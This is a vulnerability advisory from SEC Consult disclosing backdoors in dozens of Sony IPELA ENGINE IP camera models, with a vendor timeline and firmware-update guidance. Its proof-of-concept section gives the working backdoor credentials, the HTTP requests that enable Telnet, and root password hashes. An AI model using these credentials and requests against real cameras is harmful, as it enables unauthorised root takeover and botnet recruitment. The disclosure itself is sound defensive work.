We have published an accompanying blog post to this technical advisory with further information: http://blog.sec-consult.com/2016/12/backdoor-in-sony-ipela-engine-ip-cameras.html SEC Consult Vulnerability Lab Security Advisory < 20161206-0 > ======================================================================= title: Backdoor vulnerability product: Sony IPELA ENGINE IP Cameras (multiple products, see Vulnerable / tested versions below) vulnerable version: see Vulnerable / tested versions below fixed version: see Vulnerable / tested versions below CVE number: - impact: Critical homepage: https://pro.sony.com/bbsc/ssr/mkt-security/ found: 2016-10-08 by: Stefan ViehbAPck (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "Sony Professional Solutions (SPS) is a subsidiary of Japanese multinational technology and media conglomerate Sony with main focus on professional products. These range from broadcast software and video cameras to providing Outside Broadcast Units and professional displays." Source: https://en.wikipedia.org/wiki/Sony_Professional_Solutions Business recommendation: ------------------------ Attackers are able to completely takeover the Sony IPELA ENGINE IP Camera products over the network. Sony has provided updated firmware which should be installed immediately. SEC Consult recommends Sony and Sony customers to conduct a thorough security review of the affected products. It is essential to restrict access to IP cameras using VLANs, firewalls etc. Otherwise the risk of being a botnet victim (e.g. Mirai) is high. Vulnerability overview/description: ----------------------------------- Sony IPELA ENGINE IP Cameras contain multiple backdoors that, among other functionality, allow an attacker to enable the Telnet/SSH service for remote administration over the network. Other available functionality may have undesired effects to the camera image quality or other camera functionality. After enabling Telnet/SSH, another backdoor allows an attacker to gain access to a Linux shell with root privileges! The vulnerabilities are exploitable in the default configuration over the network. Exploitation over the Internet is possible, if the web interface of the device is exposed. Proof of concept: ----------------- The following application-level backdoor accounts exist: - User debug, Passwort: popeyeConnection - User primana, Passwort: primana These accounts are allowed to access specific, undocumented CGI functionality! Enabling Telnet: Execute the following HTTP requests. Afterwards the Telnet service is running (TCP port 23). The following command is for Gen5 products, verified on SNC-DH160: http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=zKw2hEr9 http://primana:primana@HOST/command/prima-factory.cgi?foo=bar&Telnet=cPoq2fi4cFk Note: This request may look a bit different for Gen6 cameras, the string "himitunokagi" (Japanese, translated: "secret key") is involved in the HTTP request processing. On Gen6 cameras, a SSH daemon exists and can be enabled as well. Furthermore an OS-level backdoor exists. This backdoor allows an attacker to login via Telnet/SSH and access the Linux shell with root privileges! Below are the password hashes for the OS-level backdoor user: root:$1$$mhF8LHkOmSgbD88/WrM790:0:0:5thgen:/root:/bin/sh (Gen5 cameras) root:iMaxAEXStYyd6:0:0:root:/root:/bin/sh (Gen6 cameras) Note: The backdoor accounts likely allow an attacker with physical access to the hardware to login via the serial port as well. Vulnerable / tested versions: ----------------------------- This vulnerability was verified on a SNC-DH160 camera with firmware version V1.82.01 (snc-ch-dh-e-series-eb-em-zb-zm-1-82-01.zip). The same vulnerabilities were found in firmware for Gen6 cameras V2.7.0 (snc-g6-series-v2-7-0.zip) during automated firmware analysis with SEC Technologies IoT Inspector. According to Sony, at least the following products are affected: SNC-CH115, SNC-CH120, SNC-CH160, SNC-CH220, SNC-CH260, SNC-DH120, SNC-DH120T, SNC-DH160, SNC-DH220, SNC-DH220T, SNC-DH260, SNC-EB520, SNC-EM520, SNC-EM521, SNC-ZB550, SNC-ZM550, SNC-ZM551 SNC-EP550, SNC-EP580, SNC-ER550, SNC-ER550C, SNC-ER580, SNC-ER585, SNC-ER585H, SNC-ZP550, SNC-ZR550 SNC-EP520, SNC-EP521, SNC-ER520, SNC-ER521, SNC-ER521C SNC-CX600, SNC-CX600W, SNC-EB600, SNC-EB600B, SNC-EB602R, SNC-EB630, SNC-EB630B, SNC-EB632R, SNC-EM600, SNC-EM601, SNC-EM602R, SNC-EM602RC, SNC-EM630, SNC-EM631, SNC-EM632R, SNC-EM632RC, SNC-VB600, SNC-VB600B, SNC-VB600B5, SNC-VB630, SNC-VB6305, SNC-VB6307, SNC-VB632D, SNC-VB635, SNC-VM600, SNC-VM600B, SNC-VM600B5, SNC-VM601, SNC-VM601B, SNC-VM602R, SNC-VM630, SNC-VM6305, SNC-VM6307, SNC-VM631, SNC-VM632R, SNC-WR600, SNC-WR602, SNC-WR602C, SNC-WR630, SNC-WR632, SNC-WR632C, SNC-XM631, SNC-XM632, SNC-XM636, SNC-XM637, SNC-VB600L, SNC-VM600L, SNC-XM631L, SNC-WR602CL Vendor contact timeline: ------------------------ 2016-10-11: Contacting vendor through Sony Prime Support, asking for product security contact. 2016-10-11: Response from Product Manager - Video Security. 2016-10-14: Vendor sets up secure document exchange. 2016-10-14: Uploading security advisory. 2016-10-14: Vendor confirms receipt of security advisory. 2016-10-24: Asking for update. 2016-11-08: Asking for update again. 2016-11-08: Vendor: advisory information has been sent to HQ Japan, they are already working on it. 2016-11-28: Sony releases updated firmware and informs SEC Consult. 2016-11-30: Asking Sony additional questions regarding the vulnerability (no answer). 2016-11-30: Informing CERT-Bund and CERT.at. 2016-12-01: CERT-Bund informs FIRST (Forum of Incident Response and Security Teams). 2016-12-06: Public release of security advisory. Solution: --------- The vendor provided the following URL to download firmware updates for the affected devices. Updates should be installed immediately: https://www.sony.co.uk/pro/article/sony-new-firmware-for-network-cameras The Sony "SNC Tool Box" can be used to confirm the current firmware version and update the device: https://pro.sony.com/bbsc/ssr/mkt-security/resource.downloads.bbsccms-assets-cat-camsec-downloads-SecurityDownloadsIPCameraTools.shtml Workaround: ----------- None available. Advisory URL: ------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://www.sec-consult.com/en/Career.htm Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://www.sec-consult.com/en/About/Contact.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Stefan ViehbAPck / @2016